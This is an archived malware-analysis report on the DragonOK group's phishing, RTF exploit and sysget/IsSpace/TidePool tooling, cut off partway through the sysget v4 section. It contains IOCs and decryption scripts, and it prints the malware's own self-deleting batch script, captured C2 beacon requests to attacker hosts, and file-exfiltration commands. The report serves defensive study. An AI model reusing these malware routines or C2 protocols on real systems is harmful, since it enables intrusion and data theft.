{
	"id": "ae673c52-e192-4022-9be2-8dbdf79cdc1c",
	"created_at": "2026-04-06T00:12:20.449063Z",
	"updated_at": "2026-04-10T03:34:17.313877Z",
	"deleted_at": null,
	"sha1_hash": "f4c1371ead52fc9c24313563bf94349006cb165d",
	"title": "DragonOK Updates Toolset and Targets Multiple Geographic Regions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2227581,
	"plain_text": "DragonOK Updates Toolset and Targets Multiple Geographic\r\nRegions\r\nBy Josh Grunzweig\r\nPublished: 2017-01-05 · Archived: 2026-04-02 11:11:42 UTC\r\nThe DragonOK group has been actively launching attacks for years. We first discussed them in April 2015 when\r\nwe witnessed them targeting a number of organizations in Japan. In recent months, Unit 42 has observed a number\r\nof attacks that we attribute to this group. Multiple new variants of the previously discussed sysget malware family\r\nhave been observed in use by DragonOK. Sysget malware was delivered both directly via phishing emails, as well\r\nas in Rich Text Format (RTF) documents exploiting the CVE-2015-1641 vulnerability (patched in MS15-033) that\r\nin turn leveraged a very unique shellcode. Additionally, we have observed instances of the IsSpace and TidePool\r\nmalware families being delivered via the same techniques. While Japan is still the most heavily targeted\r\ngeographic region by this particular actor, we also observed instances where individuals or organizations in\r\nTaiwan, Tibet, and Russia also may have been targeted.\r\nInfiltration\r\nWe observed two unique techniques of infiltration for this particular campaign:\r\n1. Phishing emails being sent with malicious executables directly attached\r\n2. 
Malicious RTF files which exploit CVE-2015-1641.\r\nThe phishing emails had the following characteristics:\r\nEmail Subjects\r\nPickup at the Juanda Airport (1-Sep)\r\nポイントプレゼントのお知らせ [Roughly Translated: Point gift announcement]\r\n20周年記念パーティー [Roughly Translated: 20th Anniversary Party]\r\n参加者の10周年記念同窓会一覧 [Roughly Translated: List of participants' 10th anniversary alumni association]\r\n子供の調査連れ [Roughly Translated: Children's investigation]\r\nG20 report\r\n記念日の再会 [Roughly Translated: Anniversary reunion]\r\n最新の人事異動通知 [Roughly Translated: Recent personnel change notice]\r\nAttachment Filenames\r\nG20 report.exe\r\nexe\r\nList of Participants.exe\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 1 of 28\n\nRegistration form.exe\r\nThese emails targeted the following industries in Japan:\r\nManufacturing\r\nHigher Education\r\nEnergy\r\nTechnology\r\nSemiconductor\r\nThe malicious RTF files in question use a distinctive shellcode to drop and execute the malicious payload as well as a decoy document. Decoy documents are legitimate, benign documents that are opened after the malicious payload has been dropped, so that the victim sees the document they were expecting and has no reason to become suspicious.\r\nTwo samples were found to include the decoy document shown in Figure 1.\r\nThe title of the document roughly translates to “Ministry of Communications \u0026 Departments Authorities Empty Sites and Hosted Public Works Source Clearance Photos”. The use of traditional Chinese indicates that the target likely resides in Taiwan, Hong Kong, or Macau; the Taiwanese subject matter of the document narrows this further, and we conclude that the intended victim was Taiwanese. These samples delivered an updated version of the IsSpace malware family, which was discussed previously in a watering hole attack targeting an aerospace firm. 
IsSpace is an evolved variant of the NFlog backdoor, which has been used by DragonOK in the past.\r\nFigure 1 Taiwanese decoy document\r\nTwo other samples were identified that used a Tibet-themed decoy document. The document in question (Figure 2) appears to be an internal newsletter from the Central Tibetan Ministry, as suggested by the logo used as well as the content of the document itself. This suggests that the malware was targeted at an individual interested in Tibetan affairs. These samples were unique in that they delivered the TidePool malware family that we reported on in May of 2016; we had not previously observed DragonOK using TidePool in attacks.\r\nFigure 2 Tibetan decoy document containing internal newsletter\r\nWe also identified an additional sample using a decoy document targeting Taiwanese victims (Figure 3), which deployed a newer sysget sample.\r\nFigure 3 Taiwanese-targeted decoy document\r\nOther new samples associated with this group used a Russian-language decoy document (Figure 4). The decoy document in question discusses the GOST block cipher, which was developed by the Soviet government in the 1970s. The combination of Russian language and Russian-specific subject matter indicates that the intended victim speaks Russian and may be interested in encryption. 
Like the previously discussed Tibetan decoy documents, these samples also delivered the TidePool malware family.\r\nFigure 4 Russian decoy document discussing the GOST block cipher\r\nFinally, multiple samples used a traditional Chinese language decoy document that discussed a subsidy welfare adjustment program. The use of traditional Chinese indicates that the target likely resides in Taiwan, Hong Kong, or Macau. Similar to other attacks witnessed, a variant of the sysget malware family is installed by these files.\r\nFigure 5 Decoy document discussing subsidy welfare adjustment program\r\nMalware Deployed\r\nIn looking at the various malware samples used in attempted attacks, the following four families and variants were identified:\r\nSysget version 2\r\nSysget version 3\r\nTidePool\r\nIsSpace\r\nWe broke the sysget classification into multiple variants when we found that a number of changes had been made since our April 2015 report. Major distinctions between the versions of sysget include the following:\r\nSysget version 2\r\nRemoved support for persistence on Windows XP\r\nReworked the URIs used for network communication\r\nAdded additional layers of encryption for network communication and stored configuration files\r\nSwitched from RC4 to AES-128\r\nSysget version 3\r\nNumerous anti-debug and anti-VM procedures added\r\nEncrypted URIs in network communication with an initial static key\r\nIn addition, we observed a sysget version 4 that was discovered in another sample during our research. 
This version is not attributed to a specific attack against an organization.\r\nIndicators of compromise related to sysget version 4 and other samples not directly attributed to specific attacks may be found in the Appendix of this blog post. Additionally, more information about the various sysget variants may also be found in the Appendix.\r\nThe TidePool samples encountered are consistent with the samples previously discussed. I encourage readers to view our previous blog post to learn more about the intricacies of this particular malware family.\r\nThe IsSpace malware sample, however, looks to have been updated since we last wrote on it. While the commands available from the command and control (C2) server remain the same, the URI structure of the network communication has been modified. Additionally, the installation routine for this malware family has been updated to be far less complex than in previously discussed versions, favoring PowerShell to set persistence and forgoing the previously used side-loading technique. A more detailed analysis of the new instances of IsSpace may be found at the end of this blog post in the Appendix.\r\nInfrastructure\r\nA number of unique domains were employed by the various Trojans used in these attacks. For the numerous instances of sysget we observed, the following domains were observed for their C2:\r\nkr44.78host[.]com\r\ngtoimage[.]com\r\ngogolekr[.]com\r\nAll of the above domains have Chinese WHOIS registrant details. 
Additionally, gtoimage[.]com and trend.gogolekr[.]com are both registered to the same registrant and resolve to the same netblock of 104.202.173.0/24.\r\nThe instances of TidePool identified communicated with the following C2 servers:\r\neurope.wikaba[.]com\r\nrussiaboy.ssl443[.]org\r\ncool.skywave[.]top\r\nThese domains did not have many definitive relations with the sysget C2 servers, except for cool.skywave[.]top, which shared a unique registrant email with the sysget C2 server trend.gogolekr[.]com. Additionally, the geographic region of the resolved IPs was consistent with the previous set, as they all resolved to East Asia. Specifically, the domains resolved to China, Korea, and Taiwan in the past six months.\r\nThe IsSpace samples communicated with the following domains:\r\nwww.dppline[.]org\r\nwww.matrens[.]top\r\nThese domains had no apparent connections to the previously discussed C2 servers, other than the fact that they resolved to Korea and Hong Kong respectively. Additionally, the registrar ‘Jiangsu Bangning Science and technology Co. Ltd.’ was used for a large number of domains. A full graph of the relations between the various attacks is shown in Figure 6.\r\nFigure 6 Relationships between attacks\r\nConclusion\r\nThe DragonOK group is quite active and continues to update its tools and tactics. Its toolset is being actively developed to make detection and analysis more difficult. Additionally, the group appears to be using additional malware toolsets such as TidePool. 
While Japan is still the most-targeted region by this group, they look to be seeking out victims in other regions as well, such as Taiwan, Tibet, and Russia.\r\nPalo Alto Networks customers are protected against this threat in the following ways:\r\nMalware families are tagged in AutoFocus via a variety of tags (TidePool, NFlog, Sysget)\r\nThe following IPS signatures detect malicious network traffic:\r\nIPS signature 14365 (IsSpace.Gen Command And Control Traffic)\r\nIPS signature 14588 (Suspicious.Gen Command And Control Traffic)\r\nIPS signature 13574 (NfLog.Gen Command And Control Traffic)\r\nIPS signature 13359 (Nflog.Gen Command And Control Traffic)\r\nAll samples are appropriately marked malicious in WildFire\r\nAppendix\r\nCVE-2015-1641 Exploit and Shellcode\r\nThis particular group uses a very specific shellcode payload when exploiting CVE-2015-1641. This CVE is a memory corruption vulnerability that allows arbitrary code execution in various versions of Microsoft Office, including 2007, 2010, and 2013.\r\nThe shellcode begins by dynamically resolving a small number of API functions from kernel32. Rather than function names, the shellcode carries hashes of those names: each name has a rotate-right-7 (ROR7) hash applied to it, and the result is then XORed against the key “\\x10\\xAD\\xBE\\xEF”. ROR-based hashing is a very common technique in shellcode to obfuscate which functions are being called. 
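As an added illustration (not code from the Unit 42 post), the following Python reproduces the kind of lookup table an analyst builds to label such hashed constants. It assumes the usual shellcode hash loop (rotate the running value right by 7, then add the next ASCII byte) and assumes the 4-byte key is applied in memory order (10 AD BE EF, i.e. 0xEFBEAD10 as a little-endian DWORD); neither detail is spelled out on this page, and the kernel32 export list is a constructed sample.

```python
# Added example, not part of the Unit 42 post: resolve ROR7-then-XOR API hashes.
# Assumption: hash loop is h = ror32(h, 7) + byte over the ASCII export name.
# Assumption: the key bytes 10 AD BE EF are XORed as the little-endian DWORD
# 0xEFBEAD10, so a constant stored in the shellcode is ror7_hash(name) ^ key.
import struct

ROR_BITS = 7
XOR_KEY = struct.unpack('<I', bytes.fromhex('10ADBEEF'))[0]  # 0xEFBEAD10

# Constructed sample of kernel32 export names a dropper like this needs.
KERNEL32_EXPORTS = [
    'LoadLibraryA', 'GetProcAddress', 'GetTempPathA', 'CreateFileA',
    'WriteFile', 'CloseHandle', 'WinExec', 'ExitProcess',
]


def ror32(value, bits):
    value &= 0xFFFFFFFF
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def ror7_hash(name):
    h = 0
    for b in name.encode('ascii'):
        h = (ror32(h, ROR_BITS) + b) & 0xFFFFFFFF
    return h


def stored_constant(name):
    # What the shellcode would carry for this export name.
    return ror7_hash(name) ^ XOR_KEY


def build_lookup(names=KERNEL32_EXPORTS):
    # Map stored constant -> export name, so a dump of the shellcode's constants
    # (such as Figure 7) can be labelled without running the sample.
    return {stored_constant(n): n for n in names}


def resolve(constants, names=KERNEL32_EXPORTS):
    # Return the export name for each constant, or None when it is not in the
    # candidate list (meaning the hash variant or the export list is wrong).
    table = build_lookup(names)
    return [table.get(c) for c in constants]


if __name__ == '__main__':
    for name in KERNEL32_EXPORTS:
        print('%08x -> %s' % (stored_constant(name), name))
```

If none of the constants from a real sample resolve against a full kernel32 export list, the assumed loop (rotation amount, add versus XOR, case handling) is the first thing to revisit; the XOR key itself only permutes the table and cannot cause a miss on its own.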
The author added the XOR operation to add another layer of obfuscation.\r\nFigure 7 API function hashes contained in shellcode\r\nAfter the shellcode resolves the necessary API functions, it searches the RTF document for a set of markers that delimit an embedded malicious payload and a decoy document.\r\nThe malicious executable is marked with a 6-byte start marker of 0xBABABABABABA and a 4-byte end marker of 0xBBBBBBBB. The decoy document is found immediately after the end marker of the malicious payload and has its own end marker of 0xBCBCBCBC. Both files are encrypted with a 4-byte XOR key, applied one 4-byte block at a time; a block that is entirely 0x00000000 is left as-is rather than XORed, so zero-filled regions of the embedded files remain visibly zero inside the RTF.\r\nThe malicious payload is XORed against the key 0xCAFEBABE and the decoy document against 0xBAADF00D, both applied as little-endian byte sequences (BE BA FE CA and 0D F0 AD BA respectively, which is how the script below writes them). The following script (Python 3) may be applied against the RTF document to extract both the malicious payload and the decoy:\r\nimport re\r\nimport sys\r\n\r\n# Markers the shellcode searches for inside the RTF.\r\nEXE_START = b\"\\xBA\\xBA\\xBA\\xBA\\xBA\\xBA\"  # 6-byte start of the embedded executable\r\nEXE_END = b\"\\xBB\\xBB\\xBB\\xBB\"  # end of the executable; the decoy starts right after it\r\nDOC_END = b\"\\xBC\\xBC\\xBC\\xBC\"  # end of the decoy document\r\n# XOR keys, written in memory (little-endian) order.\r\nEXE_KEY = b\"\\xBE\\xBA\\xFE\\xCA\"  # 0xCAFEBABE\r\nDOC_KEY = b\"\\x0D\\xF0\\xAD\\xBA\"  # 0xBAADF00D\r\n\r\ndef decrypt(data, key):\r\n  # XOR one 4-byte block at a time; an all-zero block is copied through\r\n  # untouched, mirroring what the shellcode does.\r\n  output = bytearray()\r\n  for position in range(0, len(data), 4):\r\n    window = data[position:position + 4]\r\n    if window == b\"\\x00\\x00\\x00\\x00\":\r\n      output += window\r\n    else:\r\n      output += bytes(c ^ k for c, k in zip(window, key))\r\n  return bytes(output)\r\n\r\ndef last_marker_after(data, marker, start):\r\n  # Keep the last occurrence of the marker past the start offset (the\r\n  # behaviour of the original script).\r\n  ending_point = None\r\n  for m in re.finditer(re.escape(marker), data):\r\n    if m.start() \u003e start:\r\n      ending_point = m.start()\r\n  return ending_point\r\n\r\ndef extract(data):\r\n  exe_starting_point = data.index(EXE_START) + len(EXE_START)\r\n  exe_ending_point = last_marker_after(data, EXE_END, exe_starting_point)\r\n  if exe_ending_point is None:\r\n    raise Exception(\"Unable to find correct offsets for executable.\")\r\n  exe_data = decrypt(data[exe_starting_point:exe_ending_point], EXE_KEY)\r\n  doc_starting_point = exe_ending_point + len(EXE_END)\r\n  doc_ending_point = last_marker_after(data, DOC_END, doc_starting_point)\r\n  if doc_ending_point is None:\r\n    raise Exception(\"Unable to find correct offsets for document.\")\r\n  doc_data = decrypt(data[doc_starting_point:doc_ending_point], DOC_KEY)\r\n  return exe_data, doc_data\r\n\r\ndef main():\r\n  input_file = sys.argv[1]\r\n  with open(input_file, 'rb') as input_fh:\r\n    input_data = input_fh.read()\r\n  exe, doc = extract(input_data)\r\n  for suffix, content in ((\".exe\", exe), (\".doc\", doc)):\r\n    filename = \"{}{}\".format(input_file, suffix)\r\n    with open(filename, 'wb') as output_file:\r\n      output_file.write(content)\r\n    print(\"[+] Wrote {}\".format(filename))\r\n\r\nif len(sys.argv) == 2 and __name__ == \"__main__\":\r\n  main()\r\nWhen both files are decrypted, they are written to the following location in the %TEMP% directory:\r\n../..exe\r\n../..doc\r\nNote the initial ‘..’, which represents the parent directory of %TEMP%. This, coupled with the unusual names ..exe and ..doc, makes this particular shellcode very distinctive, which is one way we have attributed these samples to the same group. After the samples have been written, they are executed via calls to WinExec.\r\nSysget v2 Analysis\r\nOne of the fundamental changes witnessed in the second iteration of sysget is the loss of persistence on Windows XP and earlier. Other changes include modifications to the URIs used for network communication.\r\nLike the original version of sysget, sysget v2 still uses a named event of ‘mcsong[]’ to ensure a single instance is running at a time. It then attempts to copy itself to the %STARTUP%/notilv.exe path. However, it uses a COM object to perform this copy that is not available on Windows XP, which prevents the malware from installing itself to this location. While the remainder of the malware operates as expected, it will not survive a restart of the system.\r\nSysget then attempts to read the following configuration file. This filename and path have changed since the original version and remain consistent in the subsequent versions.\r\n%APPDATA%/vklCen5.tmp\r\nThis configuration file holds both a unique victim identifier and a key that is used to encrypt HTTP traffic. It is encrypted with AES-128; the AES key is not the raw string but is derived by the Windows CryptoAPI (CryptDeriveKey over an MD5 hash, as the decryption script below shows) from the static string ‘734thfg9ih’. 
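The static string is therefore not the AES key itself. The following added example (not Unit 42's code) reproduces with the standard library what CryptDeriveKey does for an MD5 hash and CALG_AES_128: per Microsoft's documentation, for AES or 3DES with a non-SHA-2 hash the digest is padded into 64-byte 0x36 and 0x5C buffers (as in HMAC), each buffer is hashed, and the first 16 bytes of the concatenation become the key. The decrypt helper assumes pycryptodome is installed and assumes CryptoAPI's defaults for CryptDecrypt (AES-CBC, all-zero IV, PKCS#5 padding); the field layout parsed at the end is the one visible in the decrypted vklCen5.tmp output shown in this post (two null-padded 32-byte slots), and the sample configuration built for the test is constructed from that output.

```python
# Added example, not part of the Unit 42 post: derive the sysget config key the
# way CryptDeriveKey(MD5 -> CALG_AES_128) does, without the wincrypto module.
import hashlib


def cryptoapi_derive_key(password, key_len=16, hash_name='md5'):
    # Documented CryptDeriveKey behaviour for AES/3DES with a non-SHA-2 hash:
    # pad the digest into 64-byte 0x36 and 0x5C buffers, hash each, take the
    # first key_len bytes of the concatenation. For AES-128 that is MD5(buf36).
    digest = hashlib.new(hash_name, password).digest()
    buf36 = bytearray([0x36] * 64)
    buf5c = bytearray([0x5C] * 64)
    for i, b in enumerate(digest):
        buf36[i] ^= b
        buf5c[i] ^= b
    expanded = (hashlib.new(hash_name, bytes(buf36)).digest()
                + hashlib.new(hash_name, bytes(buf5c)).digest())
    return expanded[:key_len]


# The two static strings named on this page.
CONFIG_PASSWORD = b'734thfg9ih'     # protects %APPDATA%/vklCen5.tmp
RESPONSE_PASSWORD = b'aliado75496'  # protects the first C2 response


def decrypt_cryptoapi_aes(ciphertext, password):
    # CryptDecrypt defaults for a block cipher: CBC mode, all-zero IV, PKCS#5
    # padding. pycryptodome is an assumption here; it is not on the page.
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import unpad
    cipher = AES.new(cryptoapi_derive_key(password), AES.MODE_CBC, iv=bytes(16))
    return unpad(cipher.decrypt(ciphertext), AES.block_size)


def parse_config(plaintext, slot=32):
    # Layout seen in the decrypted vklCen5.tmp on this page: two null-padded
    # 32-byte slots, traffic key first, victim identifier second.
    if len(plaintext) < 2 * slot:
        raise ValueError('config too short: %d bytes' % len(plaintext))
    key = plaintext[:slot].rstrip(bytes(1)).decode('ascii')
    victim_id = plaintext[slot:2 * slot].rstrip(bytes(1)).decode('ascii')
    return key, victim_id


def build_config(key, victim_id, slot=32):
    # Inverse of parse_config; used to construct a sample config offline.
    return (key.encode('ascii').ljust(slot, bytes(1))
            + victim_id.encode('ascii').ljust(slot, bytes(1)))


if __name__ == '__main__':
    print('config key: ' + cryptoapi_derive_key(CONFIG_PASSWORD).hex())
    print('response key: ' + cryptoapi_derive_key(RESPONSE_PASSWORD).hex())
    print(parse_config(build_config('gh1443717133', '1059086204')))
```

Because the derived key depends only on the static string, the two 16-byte keys printed here can be dropped straight into any AES implementation (or a network decoder) to decrypt the stored configuration and the first C2 response of every sysget v2/v3 sample that uses these strings; a decrypted blob that does not split into two clean slots is the sign that the key or the padding assumption is wrong.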
Using AES-128 is a change from the previous version, where RC4 was used for all encryption operations. The following Python code may be used to decrypt this file (it relies on the wincrypto module, which reimplements the CryptoAPI calls the malware makes):\r\nimport sys\r\nfrom wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey, CryptDecrypt\r\n\r\nCALG_AES_128 = 0x660E\r\nCALG_MD5 = 0x8003\r\n\r\ndef decrypt(data, original_key):\r\n  # Mirror the malware: MD5-hash the static string, derive an AES-128 key\r\n  # from that hash with CryptDeriveKey, then CryptDecrypt (CBC, zero IV).\r\n  md5_hasher = CryptCreateHash(CALG_MD5)\r\n  CryptHashData(md5_hasher, original_key)\r\n  key = CryptDeriveKey(md5_hasher, CALG_AES_128)\r\n  return CryptDecrypt(key, data)\r\n\r\nif __name__ == \"__main__\":\r\n  with open(sys.argv[1], 'rb') as fh:\r\n    arg = fh.read()\r\n  print(repr(decrypt(arg, b'734thfg9ih')))\r\nWhen executed against an example configuration file, we see the following output, which includes the two pieces of data noted previously:\r\nC:\\\u003epython decrypt_config.py vklCen5.tmp\r\n'gh1443717133\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x001059086204\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\nNote the layout: each of the two values sits in a null-padded 32-byte slot, the traffic key first and the victim identifier second.\r\nThe encryption of this configuration file is a new feature that was not present in the original version of sysget.\r\nIf this file is not present on the system, the malware will attempt to retrieve the necessary information via an HTTP request. The following request is made to the remote command and control server. 
Note that the full URI is statically set by the malware sample.\r\nGET /index.php?type=read\u0026id=1420efbd80ce02328663631c8d8f813c\u0026pageinfo=jp\u0026lang=utf-8 HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36\r\nHost: hello.newtaiwan[.]top\r\nThe User-Agent string, which claims Windows NT 5.1 and Chrome 40, is identical in every sysget request shown in this post and is a useful network detection artifact alongside the URI patterns.\r\nThe server responds with data encrypted using the same technique previously described, with a static key of ‘aliado75496’. Once decrypted, we see the following example data being sent back to sysget:\r\ngh1443717133\\n1059086204\\n\r\nThe first string is used as a key for all subsequent network communication. The second string is treated as a unique victim identifier. This data is encrypted using the key ‘734thfg9ih’ and written to the %APPDATA%/vklCen5.tmp file.\r\nAfter this information has been obtained, the malware enters its command and control loop. An HTTP request such as the following is made to the remote server. Note that the ‘mid’ GET variable holds the MD5 hash of the previously obtained victim identifier. The remaining data in the URI is hardcoded.\r\nGET /index.php?type=get\u0026pageinfo=bridge03443\u0026lang=jp\u0026mid=5717cb8fed2750a2ee9e830a30716ed4 HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36\r\nHost: hello.newtaiwan[.]top\r\nThe response is encrypted using the unique key that was obtained previously. Should the response contain the unencrypted string ‘Fatal error’, no further actions are taken by the malware sample. Once decrypted, the response may contain one of the following two commands, each with its own purpose. 
Alternatively, if a raw command is provided, the malware will execute it and return the results.\r\nCommand: goto wrong \"[file_path]\";\\n\r\n  Description: Read the specified file and return its contents.\r\nCommand: goto right \"[filename]\" \"[identifier]\"\r\n  Description: Write a given file. The identifier is used to retrieve the file’s contents in a subsequent HTTP request.\r\nWhen the ‘goto wrong’ request is made, an HTTP POST request is made to the following URI. In this URI, the ‘list’ parameter contains the MD5 hash of the victim’s identifier.\r\n/index.php?type=register\u0026pageinfo=myid32987\u0026list=5717cb8fed2750a2ee9e830a30716ed4\r\nThe body of this POST request contains the victim’s identifier, followed by the file’s contents encrypted with the unique key. The first 50 bytes are reserved for the identifier: the 32-character MD5 hash, null-padded to 50 bytes, as shown below:\r\n0000016F  35 37 31 37 63 62 38 66  65 64 32 37 35 30 61 32 5717cb8f ed2750a2\r\n0000017F  65 65 39 65 38 33 30 61  33 30 37 31 36 65 64 34 ee9e830a 30716ed4\r\n0000018F  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........\r\n0000019F  00 00 4b 59 bc 53 53 99  2b 6f a7 b5 5a 85 c7 66 ..KY.SS. +o..Z..f\r\nOnce decrypted, the data contains both the filename (null-padded) and the contents of that file:\r\ntest.txt\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00[TRUNCATED]\\x00\\x00\\x00file contents\r\nIf the ‘goto right’ command is used, the malware will make a subsequent request to the following URI. 
The ‘cache’ variable holds the unique identifier that was provided in the ‘goto right’ command.\r\n/index.php?type=goto\u0026pageinfo=myid47386\u0026cache=identifier\r\nOnce the file contents are obtained, they are written to the specified filename in the %STARTUP% folder.\r\nWhen a raw command is received, the malware will upload the results to the following URI via a POST request:\r\n/index.php?type=register\r\nAn overview of the network communications exhibited by sysget version 2 can be seen in the figure below.\r\nFigure 8 Sysget version 2 command and control flow\r\nSysget v3 Analysis\r\nSome of the biggest changes witnessed in version 3 of sysget include the addition of numerous anti-debug and anti-VM detections, as well as the encryption of the URIs used for network communication.\r\nWhen the malware initially executes, it performs a series of checks to ensure it is not being debugged and not running in a sandbox or virtualized environment.\r\nShould these checks return false, the malware proceeds to enter its installation routine. The malware first copies itself to a temporary file in the %TEMP% directory with a filename prefix of ‘00’. It then appends 4194304 bytes (4 MB) of randomly chosen data to the end of this file. The increased file size may have been added by the author in an attempt to thwart sandboxes that impose file size limits on what is saved and/or processed. Finally, the malware copies the file from the temporary path to %STARTUP%/winlogon.exe using the same technique witnessed in version 2. 
Sysget then writes a batch script in the %TEMP% folder with the following contents, cleaning up the original files and spawning the newly written winlogon.exe executable:\r\n@echo off\r\n:t\r\ntimeout 1\r\nfor /f %%i in ('tasklist /FI \"IMAGENAME eq [original_executable_name]\" ^| find /v /c \"\"' ) do set YO=%%i\r\nif %%YO%%==4 goto :t\r\ndel /F \"[original_executable_path]\"\r\ndel /F \"[tmp_file]\"\r\nstart /B cmd /c \"[startup_winlogon.exe]\"\r\ndel /F \"[self]\"\r\nexit\r\nThe loop counts the lines of tasklist output for the original process name and keeps sleeping while that count is 4 (tasklist’s header lines plus one matching process); once the original process has exited, the script deletes the original executable and the temporary file, launches the copy in %STARTUP%, and deletes itself.\r\nAfter installation, sysget will attempt to read the same %APPDATA%/vklCen5.tmp file as witnessed in the previous variant. A number of strings within the malware, including the ‘734thfg9ih’ key used to encrypt this file, have been obfuscated via a single-byte XOR of 0x5F.\r\nSimilar to previous versions, should this vklCen5.tmp file not be present on the victim machine, it will make an external HTTP request to retrieve the necessary information. The following request is made by the malware. Readers will notice that the URI has changed from previous versions in a number of ways. This version of sysget looks to always make requests to 1.php, which is hardcoded within the malware itself. Additionally, all HTTP URIs in this version of sysget are encrypted and then base64-encoded. The initial GET request made to retrieve the victim identifier and unique key is encrypted with a key of ‘Cra%hello-12sW’. 
The subsequent response containing this information is then decrypted using a key of ‘aliado75496’, which is consistent with previous versions.\r\nGET /1.php?K+50lkzq7OtigRtWY7Z5DwkmxRhFd5n3UXyH+Flfa0S8f5h3nl6XBDMa6a3IbDiPQqWSwZh7lQRmIPLlC8Wmfr8cGv7raGEV160r73FJjnOfyJPLEKWAIyJnfPZhHdGapA6tfwfwj24TN4QbBrMJkVCLPPZoI4HNtdDEo6G3ujjyvkpWnGQnRBi6DzylNrMypV/K6Ft32dsMmmO52q4IdQ== HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36\r\nHost: gtoimage[.]com\r\nWhen the URI above is base64-decoded and subsequently decrypted, we see the following:\r\nindex.php?type=read\u0026id=692fdc3c7b2c310fc017e4af335b8dc8\u0026pageinfo=jp\u0026lang=utf-8\r\nThis URI is consistent with the previous sysget variant. It would seem the authors added this layer of encryption to hinder efforts to block the malware via network-based detections. Note that the base64 output, including its ‘+’, ‘/’ and ‘=’ characters, is placed unescaped in the query string, so the entire query is a single base64 blob with padding.\r\nAfter this initial request to retrieve the victim identifier and unique key, sysget enters its command and control loop. This process is consistent with the previous version, but has the extra layer of encryption applied to the URIs.\r\nSysget v4 Analysis\r\nThe fourth variant of sysget is nearly identical to the third variant. However, the main difference lies in the URIs used for network communication. In addition to the expected encryption of the URIs, this variant also mangles the base64 encoding that is performed afterwards. 
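Before the post's own one-off script for the v4 string, here is an added, reusable version (not the Unit 42 script) covering both forms: the v3 query string is plain base64 of the ciphertext, while the v4 form prefixes a two-digit decimal shift and rotates every base64 character, the ‘=’ padding included, through a 65-symbol alphabet by that amount. Both functions return the raw ciphertext, which still needs the AES decryption described for the earlier variants. The encoder is inferred from the decoder and is included only to construct test inputs; the embedded sample queries are the two requests captured on this page.

```python
# Added example, not part of the Unit 42 post: decode sysget v3 and v4 URIs.
import base64

# Standard base64 alphabet plus '=': 65 symbols, all of which take part in the
# v4 rotation (so '=' can appear mid-string in a mangled query).
B64_SYMBOLS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='


def decode_v3_query(query):
    # v3 (/1.php?<base64>): plain base64 of the encrypted URI.
    return base64.b64decode(query)


def decode_v4_query(query):
    # v4 (/5.php?NN<rotated base64>): first two characters are a decimal shift,
    # every following symbol is rotated back by that shift, modulo 65.
    shift = int(query[:2])
    plain = ''.join(B64_SYMBOLS[(B64_SYMBOLS.index(ch) - shift) % len(B64_SYMBOLS)]
                    for ch in query[2:])
    return base64.b64decode(plain)


def encode_v4_query(ciphertext, shift):
    # Inverse of decode_v4_query, inferred from the decoder; used here to build
    # test inputs. The malware's own encoder is not shown on the page.
    if not 0 <= shift <= 99:
        raise ValueError('shift must fit in two decimal digits')
    encoded = base64.b64encode(ciphertext).decode('ascii')
    rotated = ''.join(B64_SYMBOLS[(B64_SYMBOLS.index(ch) + shift) % len(B64_SYMBOLS)]
                      for ch in encoded)
    return '%02d%s' % (shift, rotated)


# Query strings captured on this page (GET /1.php?... against gtoimage[.]com and
# GET /5.php?... against www.sanseitime[.]com), line wrapping removed.
SAMPLE_V3_QUERY = (
    'K+50lkzq7OtigRtWY7Z5DwkmxRhFd5n3UXyH+Flfa0S8f5h3nl6XBDMa6a3IbDiPQqW'
    'SwZh7lQRmIPLlC8Wmfr8cGv7raGEV160r73FJjnOfyJPLEKWAIyJnfPZhHdGapA6tfwfwj24TN'
    '4QbBrMJkVCLPPZoI4HNtdDEo6G3ujjyvkpWnGQnRBi6DzylNrMypV/K6Ft32dsMmmO52q4IdQ=='
)
SAMPLE_V4_QUERY = (
    '62H72xihwn4LqfdOqTV4W2AthjuOeCa2k0RUvE7CicXxN2MWFre2pqH8gIdMMJQbzS0AMo+rT'
    '4GGalhcebmCbjdrjZlyDhmUjE7QO5mIXZTAucGt3LeLXxOxGiV1G4zecHSPAX3AiAeR+BGFsc3'
    'wtMhOWzXfithXYeCKnjh1O7pXsYqyKqfl=HpVzs4YXZb=UQY=BNEnr/77jW5JTLNI4aed99'
)


def sample_ciphertext_lengths():
    # Both captured queries decode to AES-block-aligned ciphertext.
    return len(decode_v3_query(SAMPLE_V3_QUERY)), len(decode_v4_query(SAMPLE_V4_QUERY))


if __name__ == '__main__':
    print('v3 ciphertext bytes: %d, v4 ciphertext bytes: %d' % sample_ciphertext_lengths())
```

Both captured queries decode to exactly 160 bytes of ciphertext. That is consistent with a 78-character URI such as the decrypted v3 example being encrypted as a UTF-16 wide string (156 bytes, PKCS#5-padded to 160), but confirming that requires the per-variant key; what the decoder does establish on its own is that the v4 shift is applied across the whole 65-symbol alphabet, since the trailing ‘99’ of the captured query only becomes valid ‘==’ padding under that rule.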
